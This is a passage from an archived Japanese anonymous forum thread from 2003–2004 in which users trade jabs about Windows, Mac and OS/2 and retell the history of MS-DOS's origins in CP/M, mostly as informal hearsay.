ちゃんと調べてから書き込もうぜ。

164 :Be名無しさん:03/12/24 11:34
>>162
XpだってOS/2に寄生してんじゃん。

165 :162:03/12/24 13:44
Winなんて糞は引合いに出してませんが?
どうやらこのXerはOS9以前のMacという偽りのない現実を突き付けられて
曲解し逃げているようだw。

166 :Be名無しさん:03/12/24 14:41
OS/2は発売こそIBMだが、開発はMicrosoftだろ。
それに互換APIを用意搭載したのはOS/2側だし。

167 :Be名無しさん:03/12/24 14:41
>>165
> OS9以前のMacという偽りのない現実


168 :Be名無しさん:03/12/24 14:43
MSが寄生したのはOS/2じゃなくてVMSとMachだな。
共に開発者は現MS社員だが。


169 :Be名無しさん:03/12/24 16:26
おおぐいだな

170 :Be名無しさん:03/12/26 23:40
>>161
アップルにも週間でセキュリティパッチ出すぐらい
誠意をみせて欲しいものだ。

171 :Be名無しさん:03/12/27 01:06
創刊号でネタが尽きるのでやりません。
週刊でできるのはMSならでは。

172 :爆弾発言者:03/12/27 23:06
DosはCP/Mです
CP/M作った人がリバースコンパイルしたら
自分の書いたコードが出てきたそうです。
IBMは彼に賠償金を払ったそうです。
MSが一から自社で開発したものはほとんど皆無です。
飲む、打つ、買うの三拍子なのです(飲み込む)(打叩く)(買収)

173 :Be名無しさん:03/12/28 01:31
Win、Mac、Linux、Unixは他に専用の板があるのに何でOS板使うの?
こんなスレさっさと終了して、Tron、OS/2、Be、Osaskユーザに明け渡しなよ。

174 :Be名無しさん:03/12/29 08:50
>>172
それの何処が爆弾発言なんだか。
リバースコンパイル云々の話は知らんが。

175 :Be名無しさん:03/12/29 14:56
逆汗したらCP/Mだったってのは有名な話
確かキルドル本人がなんかのインタビューで答えてた

176 :Be名無しさん:04/02/15 02:15
DOSの最初のバージョンはCP/Mのパクリそのものです。
ただ、Ver2以降は階層ディレクトリやファイルハンドルなど
UNIXのファイル操作を真似たAPIやUNIXの環境変数などUNIXから
パクった機能が追加されて使いやすくなったのは事実。
CP/M-86使ったことあるけど、MS-DOSの方が高機能で使いやすかった。
また、開発ツールもMASMはとても高機能で使いやすかった。
CP/M-86のASMは使いづらいし、低機能だった。
デジタルリサーチは怠けてたから、マイクロソフトに負けただけでしょ。

個人的にはMacOS X好きだけど、どうしても必要なソフトがWindowsでしか
出てないのがあるし、WindowsがあればMac必要ないからMacは使ってない。
Win95出る前のようにMacが流行ればいいなぁ。

177 :Be名無しさん:04/02/17 01:58
>DOSの最初のバージョンはCP/Mのパクリそのものです。

そもそも最初はDRからCP/M86を買い取ってIBMに売り渡すつもりだったしね。
ところがキルダール(の嫁)に門前払いくらったんで、仕方ねえクローン探すべ、っつって、
CP/Mクローンを作ってる香具師から買ってきてMS-DOSに仕立てた。

そんな訳でMS-DOSには最初のバージョンからCP/Mのエミュレーション機能があったし、
それは8086の8080に対する上位互換性を利用したソフトウェア的なものだったけど、
他にもPCにアドオンするZ80カードとDR純正のCP/M80をセットにした
CP/MコンパチブルキットもMS直々に売っていた。
(そして、世界で一番たくさん売れたCP/Mパッケージは、MSのものだった)

MS-DOSの初期の成功は、こうやってCP/Mの顧客を呼び込んだこと、
8bit世代の資産を互換性によって維持したことによってもたらされた。


178 :Be名無しさん:04/02/17 21:14
そして、永遠に16bit互換のWindows。


179 :鳥取砂丘 ◆Dream/3P/. :04/03/05 14:26
win64はvdmがないよ(´・ω・`)

180 :Be名無しさん:04/03/06 13:44
↑鳥取砂丘 #枹sGLq畦 (infoweb)



181 :Be名無しさん:04/03/12 10:52
“東大iMac”はこう設置されている
ttp://blog.livedoor.jp/takeshi_a/archives/194914.html

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)